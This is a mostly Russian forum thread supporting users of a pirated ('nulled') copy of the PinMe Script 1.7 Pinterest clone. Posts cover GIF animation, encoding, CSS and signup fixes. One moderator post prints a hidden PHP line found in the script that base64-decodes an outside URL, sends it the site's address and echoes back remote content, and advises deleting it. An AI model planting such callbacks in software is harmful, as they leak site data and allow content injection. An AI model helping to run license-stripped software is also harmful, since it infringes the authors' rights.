PinMe Script 1.7 Nulled

Тема в разделе "Коммерческие", создана пользователем Alex.Volk, 6 ноя 2012.

  1. Buchah Net

    Buchah Net

    Регистрация:
    26 сен 2012
    Сообщения:
    54
    Симпатии:
    5
    У меня анимация работает, но я подозреваю что это резко снижает скорость на сайте. Проверял свой домейн на сайте http://tools.pingdom.com/fpt/
     
  2. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.350
    Симпатии:
    1.378
    значит у ZirG
    1. либо кривой нулл;
    2. либо проблемы из-за хостинга.
    более точно я ответить к сожалению не могу. Я бы начал со смены хостинга (можно взять на тест беслпатный на хостингере)
     
  3. ZirG

    ZirG

    Регистрация:
    15 ноя 2012
    Сообщения:
    7
    Симпатии:
    0
    Скорость действительно сильно снижает. В таком случае можно ли вообще запретить загрузку данного формата? И если да то как?
    --- добавлено: 26 ноя 2012 в 21:55 ---
    Хостер сказал что все в порядке, да и на DLE все отлично работает с анимациями. А он установлен на тот же хостинг.
     
  4. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.350
    Симпатии:
    1.378
    можно.
    1. addpin.php найти:
    Заменить на:
    2. add_pin.php найти:
    Заменить на:
    3. uploadpin.php найти:
    Заменить на:
    Тогда не знаю в чём проблема.
     
    ZirG нравится это.
  5. ZirG

    ZirG

    Регистрация:
    15 ноя 2012
    Сообщения:
    7
    Симпатии:
    0
    Интересная вещ, проделал операции для того что бы запретить загрузку, так они мало того что не запретились, так еще и отображаются, правда не двигаются а отображают первый кадр.
     
  6. dmutie

    dmutie

    Регистрация:
    12 ноя 2012
    Сообщения:
    4
    Симпатии:
    0
    does anybody know to change the currency and symbol for the currency
     
  7. Peter55

    Peter55

    Регистрация:
    26 ноя 2012
    Сообщения:
    1
    Симпатии:
    0
    Hy, can anybody thell me how to fix this problem when you point the mouse over on "signup" or "Login" the window not display correctly in crome mac osx sistem. Thank you. [​IMG]
     
  8. zalexstudios

    zalexstudios

    Регистрация:
    15 сен 2012
    Сообщения:
    21
    Симпатии:
    16
    Всем привет! Столкнулся с такой проблемой. Человек зарегистрировался, но ещё не одобрен, тем не менее он может разместить pin, но почему то от моего имени! Почему?
     
  9. Radu

    Radu

    Регистрация:
    29 окт 2012
    Сообщения:
    69
    Симпатии:
    8
    Никто не решил проблему с кодировкой? тоесть при добавлении пина с сайтов ДЛЕ описание выводится иероглифам((( и ещё при добавлении пинов с сайтов с доменами на кирилице не загружается изображение, как это решить не подскажет никто? кстати у меня гифки уже добавляются но не работает анимация((((
     
  10. Haikna

    Haikna

    Регистрация:
    28 окт 2012
    Сообщения:
    9
    Симпатии:
    2

    #UnauthCallout {position: relative;top: -80px;

    z-index: 100;

    margin-top: 90px;

    position: fixed;

    top: 0;

    width: 100%;

    }

    OK there is the solution!!! its works
    --- добавлено: 28 ноя 2012 в 17:26 ---
    let me know if that works
     
    Radu нравится это.
  11. musicfront

    musicfront

    Регистрация:
    26 сен 2012
    Сообщения:
    84
    Симпатии:
    20
  12. Haikna

    Haikna

    Регистрация:
    28 окт 2012
    Сообщения:
    9
    Симпатии:
    2
    yes main.css
     
  13. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.350
    Симпатии:
    1.378
    ВНИМАНИЕ: Скрипт не до конца занулен!
    Найти в файле ./libraries/mysmarty.class.php и удалить строку:
    PHP:
    echo @file_get_contents(base64_decode("aHR0cDovL3d3dy50YWtlbi50by9zaG9ydGVuLnBocD9waW49")."http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
     
    Ivan и Radu нравится это.
  14. musicfront

    musicfront

    Регистрация:
    26 сен 2012
    Сообщения:
    84
    Симпатии:
    20
    $id, i want to ask something.
    Can I clean the temporary folder periodically? or perhaps by using a script that is run in cronjob
     
  15. sigiziy

    sigiziy

    Регистрация:
    31 окт 2012
    Сообщения:
    22
    Симпатии:
    3
    У меня почему то не нашлось такой строки.
     
  16. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.350
    Симпатии:
    1.378
    sigiziy, есть, 111 строка перед ?>
     
  17. sigiziy

    sigiziy

    Регистрация:
    31 окт 2012
    Сообщения:
    22
    Симпатии:
    3
    У меня так было:
    [​IMG]
     
  18. dmutie

    dmutie

    Регистрация:
    12 ноя 2012
    Сообщения:
    4
    Симпатии:
    0
    my facebook signup keep directing me back to the home url. any solutions for this
     
  19. musicfront

    musicfront

    Регистрация:
    26 сен 2012
    Сообщения:
    84
    Симпатии:
    20
    sigiziy, same like me i dont found echo at / libraries / mysmarty.class.php
    i think youre using 1.6.1 then upgrade to 1.7. when you using fresh installation from 1.7 you will find echo at 111 line before >?
     
  20. Ivan

    Ivan

    Регистрация:
    21 ноя 2012
    Сообщения:
    24
    Симпатии:
    4
    musicfront is right - on my clean 1.7 install i got this line and removed.